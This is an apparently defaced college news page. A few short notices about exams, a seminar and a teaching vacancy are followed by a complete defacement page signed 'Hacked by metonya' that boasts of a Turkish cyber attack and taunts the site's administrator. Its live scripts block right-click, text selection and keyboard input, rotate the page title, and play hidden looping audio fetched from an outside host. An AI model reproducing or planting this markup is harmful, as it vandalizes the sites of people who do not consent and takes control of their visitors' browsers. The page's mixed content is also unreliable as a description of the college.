• 1.The 1st Midterm of BS English and Psychology will commence on 09th January 2023.
  • >>> 2. The 1st Editin of College Magzine, the talent will be published on 31st January 2023.
  • >>> 3. The Practical of M.Sc Psychology Part-II will start on 17th January 2023.
  • >>> 4. The Seminar on Iqbaliyat will be held on 17th January 2023.
  • >>> 6.The Post of Assistant Professor of English is vacant. Minimum qualification for this Post is M.Phil. The candidates may apply online. The last date to apply for the said post is 20th January 2023.

Notes

Hacked by metona

<!DOCTYPE html>

<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Hacked By metonya</title>
          <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="keywords" content="20script">
    <meta name="author" content="balyan">
       <link rel="SHORTCUT ICON" href="http://www.turkhackteam.org/images/misc/navbits_start.gif">
       <style type="text/css">
                        .sp-container h2.frame-5 span {
                        color: #fff;}
                </style>
                <![endif]-->

    <script type="text/javascript">
            var PsychoStatus=
    {
    messageTable:[], canScroll:true, currentPos:0, msgIndex:-1, period:150, cycle:0,
    maxCycles:1, useTitle:false, defTitle:"", tail:' - ~ - ', topLevel:self,

    stop:function()
    {
    if(!this.useTitle)
    this.canScroll=false;
    },

    start:function()
    {
    this.canScroll=true;
    },

    cookie:function(action)
    {
    var m,ind,dt=new Date();

    dt.setDate( dt.getDate()+30 );

    if( document.cookie )
    {
    if( (m=document.cookie.match(/PsychoStatusIndex=(d+)/)) )
    {
    this.msgIndex=Number(m[1]);

    if( this.msgIndex < this.messageTable.length-2 )
     this.msgIndex++;
    else
     this.msgIndex=0;
    }
    else
    {
    while( (ind=Math.floor( Math.random()*(this.messageTable.length-1)))==this.msgIndex )
    ;
    this.msgIndex=ind;
    }

    if(!action)
    if( (m=document.cookie.match(/PsychoStatusMode=(d)/)) )
     this.useTitle=Number(m[1]);
    }
    else
    this.msgIndex=Math.floor( Math.random()*(this.messageTable.length-1) );

    if(action)
    document.cookie="PsychoStatusMode=" + (this.useTitle?1:0)+";path=/;expires="+dt.toGMTString();
    else
    document.cookie="PsychoStatusIndex=" + this.msgIndex+";path=/;expires="+dt.toGMTString();

    },

    load:function()
    {
    this.maxCycles=arguments[0];
    this.period=arguments[1];

    for(var argOffset=2,i=argOffset; i<arguments.length; i++)
    this.messageTable[i-argOffset]=arguments[i]+this.tail;

    this.stopOnHover();
    this.cookie(false);

    try
    {
    var p=window.self;
    do
    {
     this.defTitle=parent.document.title;
     p=p.parent;
     this.topLevel=p;
    }while( p.parent!=top );
    }
    catch(e)
    {
    this.topLevel=p;
    this.defTitle=this.topLevel.document.title;

    if(this.topLevel!=top)
     this.useTitle=false;
    }

    this.currentPos=this.messageTable[ this.msgIndex ].length-this.tail.length;

    if(typeof this.topLevel.document.title!='string')
    this.useTitle=false;

    this.scroll();
    },

    writeStatus:function(s)
    {
    try{window.status=s}catch(e){this.useTitle=true};
    },

    scroll:function()
    {
    var str;

    if( this.canScroll )
    {
    str=this.messageTable[ this.msgIndex ];

    str=str.substring(this.currentPos)+str.substring(0,this.currentPos);

    if(this.useTitle)
    this.topLevel.document.title=str;
    else
    this.writeStatus(str);

    if(++this.currentPos==str.length)
    {
    this.currentPos=0;
    this.cycle++;
    }
    }

    if(this.cycle < this.maxCycles+1)
    setTimeout('PsychoStatus.scroll()', this.period);
    else
    {
    if(this.useTitle && this.defTitle.length)
    this.topLevel.document.title=this.defTitle;
    else
    if( (str=this.messageTable[ this.messageTable.length-1 ].replace(new RegExp(this.tail+'$'),')).length )
     this.writeStatus(str);

    this.cookie(true);
    }
    },

    stopOnHover:function()
    {
    if(document.links)
    for(var i=0, len=document.links.length; i<len; i++)
    {
    this.addToHandler(document.links[i],'onmouseover', new Function("PsychoStatus.stop()") );
    this.addToHandler(document.links[i],'onmouseout', new Function("PsychoStatus.start()") );
    }

    if(document.forms)
    for(var i=0, len=document.forms.length; i<len; i++)
    for(var j=0, f=document.forms[i].elements, fLen=f.length; j<fLen; j++)
     if( f[j].type && /button|submit|reset|file/.test( f[j].type ) )
     {
      this.addToHandler(f[j], 'onmouseover', new Function("PsychoStatus.stop()") );
      this.addToHandler(f[j], 'onmouseout', new Function("PsychoStatus.start()") );
     }
    },

    addToHandler:function(obj, evt, func)
    {
    if(obj[evt])
    {
    obj[evt]=function(f,g)
    {
     return function()
     {
      f.apply(this,arguments);
      return g.apply(this,arguments);
     };
    }(func, obj[evt]);
    }
    else
    obj[evt]=func;
    }

    }
    </script>
    <script type="text/javascript">
            <!--
                var message="";
                function clickIE4(){
                        if (event.button==2){
                        (message);
                        return false;
                        }
                }
                function clickNS4(e){
                        if (document.layers||document.getElementById&&!document.all){
                                if (e.which==2||e.which==3){
                                        (message);
                                        return false;
                                }
                        }
                }
                if (document.layers){
                        document.captureEvents(Event.MOUSEDOWN);
                        document.onmousedown=clickNS4;
                }
                else if (document.all&&!document.getElementById){
                        document.onmousedown=clickIE4;
                }
                document.oncontextmenu=new Function("return false")
                // -->
    </script>
    <style type="text/css">
                    body {
        background: #310404 url(http://i.hizliresim.com/qb0G6Q.png) repeat top left;
        cursor: url(), progress;
    }
    .pc-container {
        position: fixed;
        top: 0px;
        left: 0px;
        width: 100%;
        height: 100%;
        z-index: 0;
        background: -webkit-radial-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0.8) 55%, rgba(0, 0, 0, 1.0));
        background: -moz-radial-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0.8) 55%, rgba(0, 0, 0, 1.0));
        background: -ms-radial-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0.8) 55%, rgba(0, 0, 0, 1.0));
        background: radial-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0.8) 55%, rgba(0, 0, 0, 1.0));
    }
    .pc-content {
        position: absolute;
        width: 100%;
        height: 100%;
        left: 0px;
        top: 0px;
        z-index: 1000;
    }
    .pc-container h2 {
        position: absolute;
        top: 50%;
        line-height: 100px;
        height: 100px;
        margin-top: -50px;
        font-size: 100px;
        width: 100%;
        text-align: center;
        color: transparent;
        -webkit-animation: blurFadeInOut 4s ease-in backwards;
        -moz-animation: blurFadeInOut 4s ease-in backwards;
        -ms-animation: blurFadeInOut 4s ease-in backwards;
        animation: blurFadeInOut 4s ease-in backwards;
    }
    .pc-container h2.frame-1 {
        font-family: 'PAPYRUS', sans-serif;
        -webkit-animation-delay: 0s;
        -moz-animation-delay: 0s;
        -ms-animation-delay: 0s;
        animation-delay: 0s;
    }
    .pc-container h2.frame-2 {
        font-family: 'PAPYRUS', sans-serif;
        -webkit-animation-delay: 3s;
        -moz-animation-delay: 3s;
        -ms-animation-delay: 3s;
        animation-delay: 3s;
    }
    .pc-container h2.frame-3 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 100px;
        -webkit-animation-delay: 6s;
        -moz-animation-delay: 6s;
        -ms-animation-delay: 6s;
        animation-delay: 6s;
    }
    .pc-container h2.frame-4 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 80px;
        -webkit-animation-delay: 8700ms;
        -moz-animation-delay: 8700ms;
        -ms-animation-delay: 8700ms;
        animation-delay: 8700ms;
    }
    .pc-container h2.frame-5 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 80px;
        -webkit-animation-delay: 12s;
        -moz-animation-delay: 12s;
        -ms-animation-delay: 12s;
        animation-delay: 12s;
    }
    .pc-container h2.frame-6 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 30px;
        -webkit-animation-delay: 15s;
        -moz-animation-delay: 15s;
        -ms-animation-delay: 15s;
        animation-delay: 15s;
    }
    .pc-container h2.frame-7 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 100px;
        -webkit-animation-delay: 17700ms;
        -moz-animation-delay: 17700ms;
        -ms-animation-delay: 17700ms;
        animation-delay: 17700ms;
    }
    .pc-container h2.frame-8 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 100px;
        -webkit-animation-delay: 20700ms;
        -moz-animation-delay: 20700ms;
        -ms-animation-delay: 20700ms;
        animation-delay: 20700ms;
    }
    .pc-container h2.frame-9 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 60px;
        -webkit-animation-delay: 23700ms;
        -moz-animation-delay: 23700ms;
        -ms-animation-delay: 23700ms;
        animation-delay: 23700ms;
    }
    .pc-container h2.frame-10 {
        font-family: 'PAPYRUS', sans-serif;
        font-size: 70px;
        -webkit-animation-delay: 26100ms;
        -moz-animation-delay: 26100ms;
        -ms-animation-delay: 26100ms;
        animation-delay: 26100ms;
    }
    .pc-container h2.frame-11 {
        -webkit-animation: none;
        -moz-animation: none;
        -ms-animation: none;
        animation: none;
        color: transparent;
    }
    .pc-container h2.frame-11 span {
        font-family: 'PAPYRUS', sans-serif;
                        font-size: 30px;
        -webkit-animation: blurFadeIn 3s ease-in 29s backwards;
        -moz-animation: blurFadeIn 1s ease-in 29s backwards;
        -ms-animation: blurFadeIn 3s ease-in 29s backwards;
        animation: blurFadeIn 3s ease-in 29s backwards;
        color:#FF0B0A;
        text-shadow: 0px 0px 2px #FF0B0A;
    }
    .pc-container h2.frame-11 span:nth-child(2) {
        font-family: 'PAPYRUS', sans-serif;
                        font-size: 30px;
        -webkit-animation-delay: 30s;
        -moz-animation-delay: 30s;
        -ms-animation-delay: 30s;
        animation-delay: 30s;
        color:#FFF;
        text-shadow: 0px 0px 2px #FFF;
    }
    .pc-container h2.frame-11 span:nth-child(3) {
        font-family: 'PAPYRUS', sans-serif;
                        font-size: 30px;
        -webkit-animation-delay: 31s;
        -moz-animation-delay: 31s;
        -ms-animation-delay: 31s;
        animation-delay: 31s;
        color:#FF0B0A;
        text-shadow: 0px 0px 2px #FF0B0A;
    }
    .pc-container h2.frame-11 span:nth-child(4) {
        font-family: 'Iceberg', cursive;
        font-size: 30px;
        -webkit-animation-delay: 32s;
        -moz-animation-delay: 32s;
        -ms-animation-delay: 32s;
        animation-delay: 32s;
        color:#FFF;
        text-shadow: 0px 0px 2px #FFF;
    }
    .pc-circle-link {
        font-family: 'Iceberg', cursive;
        position: absolute;
        left: 50%;
        bottom: 30px;
        margin-left: -45px;
        text-align: center;
        line-height: 90px;
        width: 90px;
        height: 90px;
        background: #fff;
        color: #3f1616;
        font-size: 21px;
        -webkit-border-radius: 50%;
        -moz-border-radius: 50%;
        border-radius: 50%;
        -webkit-animation: fadeInRotate 1s linear 32200ms backwards;
        -moz-animation: fadeInRotate 1s linear 32200ms backwards;
        -ms-animation: fadeInRotate 1s linear 32200ms backwards;
        animation: fadeInRotate 1s linear 32200ms backwards;
        -webkit-transform: scale(1) rotate(0deg);
        -moz-transform: scale(1) rotate(0deg);
        -o-transform: scale(1) rotate(0deg);
        -ms-transform: scale(1) rotate(0deg);
        transform: scale(1) rotate(0deg);
    }
    .pc-circle-link:hover {
        background: #85373b;
        color: #fff;
    }
    /**/
    @-webkit-keyframes blurFadeInOut{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                -webkit-transform: scale(1.3);
        }
        20%,75%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                -webkit-transform: scale(1);
        }
        100%{
                opacity: 0;
                text-shadow: 0px 0px 50px #fff;
                -webkit-transform: scale(0);
        }
    }
    @-webkit-keyframes blurFadeIn{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                -webkit-transform: scale(1.3);
        }
        50%{
                opacity: 0.5;
                text-shadow: 0px 0px 10px #fff;
                -webkit-transform: scale(1.1);
        }
        100%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                -webkit-transform: scale(1);
        }
    }
    @-webkit-keyframes fadeInBack{
        0%{
                opacity: 0;
                -webkit-transform: scale(0);
        }
        50%{
                opacity: 0.4;
                -webkit-transform: scale(2);
        }
        100%{
                opacity: 0.2;
                -webkit-transform: scale(5);
        }
    }
    @-webkit-keyframes fadeInRotate{
        0%{
                opacity: 0;
                -webkit-transform: scale(0) rotate(360deg);
        }
        100%{
                opacity: 1;
                -webkit-transform: scale(1) rotate(0deg);
        }
    }
    /**/
    @-moz-keyframes blurFadeInOut{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                -moz-transform: scale(1.3);
        }
        20%,75%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                -moz-transform: scale(1);
        }
        100%{
                opacity: 0;
                text-shadow: 0px 0px 50px #fff;
                -moz-transform: scale(0);
        }
    }
    @-moz-keyframes blurFadeIn{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                -moz-transform: scale(1.3);
        }
        100%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                -moz-transform: scale(1);
        }
    }
    @-moz-keyframes fadeInBack{
        0%{
                opacity: 0;
                -moz-transform: scale(0);
        }
        50%{
                opacity: 0.4;
                -moz-transform: scale(2);
        }
        100%{
                opacity: 0.2;
                -moz-transform: scale(5);
        }
    }
    @-moz-keyframes fadeInRotate{
        0%{
                opacity: 0;
                -moz-transform: scale(0) rotate(360deg);
        }
        100%{
                opacity: 1;
                -moz-transform: scale(1) rotate(0deg);
        }
    }
    /**/
    @keyframes blurFadeInOut{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                transform: scale(1.3);
        }
        20%,75%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                transform: scale(1);
        }
        100%{
                opacity: 0;
                text-shadow: 0px 0px 50px #fff;
                transform: scale(0);
        }
    }
    @keyframes blurFadeIn{
        0%{
                opacity: 0;
                text-shadow: 0px 0px 40px #fff;
                transform: scale(1.3);
        }
        50%{
                opacity: 0.5;
                text-shadow: 0px 0px 10px #fff;
                transform: scale(1.1);
        }
        100%{
                opacity: 1;
                text-shadow: 0px 0px 1px #fff;
                transform: scale(1);
        }
    }
    @keyframes fadeInBack{
        0%{
                opacity: 0;
                transform: scale(0);
        }
        50%{
                opacity: 0.4;
                transform: scale(2);
        }
        100%{
                opacity: 0.2;
                transform: scale(5);
        }
    }
    @keyframes fadeInRotate{
        0%{
                opacity: 0;
                transform: scale(0) rotate(360deg);
        }
        100%{
                opacity: 1;
                transform: scale(1) rotate(0deg);
        }
    }
    </style>
    <style type="text/css">
span.c1 {text-decoration: underline}
    </style>
  </head>
  <body>  
    <div class="container pc-container">
      <div class="pc-globe"></div>
      <h2 class="frame-1">
        Hacked by metonya ZoRRoKiN</h2>
      <h2 class="frame-2">
       UnderGroundTim!</h2>
      <h2 class="frame-3">
       Turkish Cyber Attack !
      </h2>
      <h2 class="frame-4">
        Nothing to worry here.Peace No War!
      </h2>
      <h2 class="frame-5">
        metonya Was Here
      </h2>
      <h2 class="frame-6">
        SORRY ADMIN<br>YOUR SECURITY IS LOW<br>
YOUR DATABASE IS SAFE<br>
      </h2>
      <h2 class="frame-7">
       We are seeing you...!
      </h2>
      <h2 class="frame-8">
        'Whois' TurkHackTeam? Search To Google...
      </h2>
      <h2 class="frame-9">
        (^_^)
      </h2>
      <h2 class="frame-10">
       [+]--We Turkish Hacker--[+]<br>
           We Come Back
      </h2>
      <h2 class="frame-11">
        <span>We are Turkey.</span> <span>metonya ZoRRoKiN </span> <span>We Do not Forget</span>
      </h2><a class="pc-circle-link" href="javascript:history.go(0)">Replay</a>
    </div> <script type="text/javascript">
            PsychoStatus.useTitle = true;
                PsychoStatus.load(10, 120,
                        "Website Hacked By: (A.S)");
    </script>
        
        <body onkeydown="return false">
<embed src="http://picosong.com/MEZR/" width="0" height="0" hidden="true" autostart="true" loop="true">
</embed>
        <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"></body>
<script type="text/javascript">

//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

</script>
<body onkeydown="return false">
<script type="text/javascript">

var colour="#000000";
var sparkles=120;


var x=ox=400;
var y=oy=300;
var swide=800;
var shigh=600;
var sleft=sdown=0;
var tiny=new Array();
var star=new Array();
var starv=new Array();
var starx=new Array();
var stary=new Array();
var tinyx=new Array();
var tinyy=new Array();
var tinyv=new Array();

window.onload=function() { if (document.getElementById) {
  var i, rats, rlef, rdow;
  for (var i=0; i<sparkles; i++) {
    var rats=createDiv(3, 3);
    rats.style.visibility="hidden";
    document.body.appendChild(tiny[i]=rats);
    starv[i]=0;
    tinyv[i]=0;
    var rats=createDiv(5, 5);
    rats.style.backgroundColor="transparent";
    rats.style.visibility="hidden";
    var rlef=createDiv(1, 5);
    var rdow=createDiv(5, 1);
    rats.appendChild(rlef);
    rats.appendChild(rdow);
    rlef.style.top="2px";
    rlef.style.left="0px";
    rdow.style.top="0px";
    rdow.style.left="2px";
    document.body.appendChild(star[i]=rats);
  }
  set_width();
  sparkle();
}}

function sparkle() {
  var c;
  if (x!=ox || y!=oy) {
    ox=x;
    oy=y;
    for (c=0; c<sparkles; c++) if (!starv[c]) {
      star[c].style.left=(starx[c]=x)+"px";
      star[c].style.top=(stary[c]=y)+"px";
      star[c].style.clip="rect(0px, 5px, 5px, 0px)";
      star[c].style.visibility="visible";
      starv[c]=50;
      break;
    }
  }
  for (c=0; c<sparkles; c++) {
    if (starv[c]) update_star(c);
    if (tinyv[c]) update_tiny(c);
  }
  setTimeout("sparkle()", 40);
}

function update_star(i) {
  if (--starv[i]==25) star[i].style.clip="rect(1px, 4px, 4px, 1px)";
  if (starv[i]) {
    stary[i]+=1+Math.random()*3;
    if (stary[i]<shigh+sdown) {
      star[i].style.top=stary[i]+"px";
      starx[i]+=(i%5-2)/5;
      star[i].style.left=starx[i]+"px";
    }
    else {
      star[i].style.visibility="hidden";
      starv[i]=0;
      return;
    }
  }
  else {
    tinyv[i]=50;
    tiny[i].style.top=(tinyy[i]=stary[i])+"px";
    tiny[i].style.left=(tinyx[i]=starx[i])+"px";
    tiny[i].style.width="2px";
    tiny[i].style.height="2px";
    star[i].style.visibility="hidden";
    tiny[i].style.visibility="visible"
  }
}

function update_tiny(i) {
  if (--tinyv[i]==25) {
    tiny[i].style.width="1px";
    tiny[i].style.height="1px";
  }
  if (tinyv[i]) {
    tinyy[i]+=1+Math.random()*3;
    if (tinyy[i]<shigh+sdown) {
      tiny[i].style.top=tinyy[i]+"px";
      tinyx[i]+=(i%5-2)/5;
      tiny[i].style.left=tinyx[i]+"px";
    }
    else {
      tiny[i].style.visibility="hidden";
      tinyv[i]=0;
      return;
    }
  }
  else tiny[i].style.visibility="hidden";
}

document.onmousemove=mouse;
function mouse(e) {
  set_scroll();
  y=(e)?e.pageY:event.y+sdown;
  x=(e)?e.pageX:event.x+sleft;
}

function set_scroll() {
  if (typeof(self.pageYOffset)=="number") {
    sdown=self.pageYOffset;
    sleft=self.pageXOffset;
  }
  else if (document.body.scrollTop || document.body.scrollLeft) {
    sdown=document.body.scrollTop;
    sleft=document.body.scrollLeft;
  }
  else if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) {
    sleft=document.documentElement.scrollLeft;
        sdown=document.documentElement.scrollTop;
  }
  else {
    sdown=0;
    sleft=0;
  }
}

window.onresize=set_width;
function set_width() {
  if (typeof(self.innerWidth)=="number") {
    swide=self.innerWidth;
    shigh=self.innerHeight;
  }
  else if (document.documentElement && document.documentElement.clientWidth) {
    swide=document.documentElement.clientWidth;
    shigh=document.documentElement.clientHeight;
  }
  else if (document.body.clientWidth) {
    swide=document.body.clientWidth;
    shigh=document.body.clientHeight;
  }
}

function createDiv(height, width) {
  var div=document.createElement("div");
  div.style.position="absolute";
  div.style.height=height+"px";
  div.style.width=width+"px";
  div.style.overflow="hidden";
  div.style.backgroundColor=colour;
  return (div);
}

</script>
</body></html>

Prepared By : hacked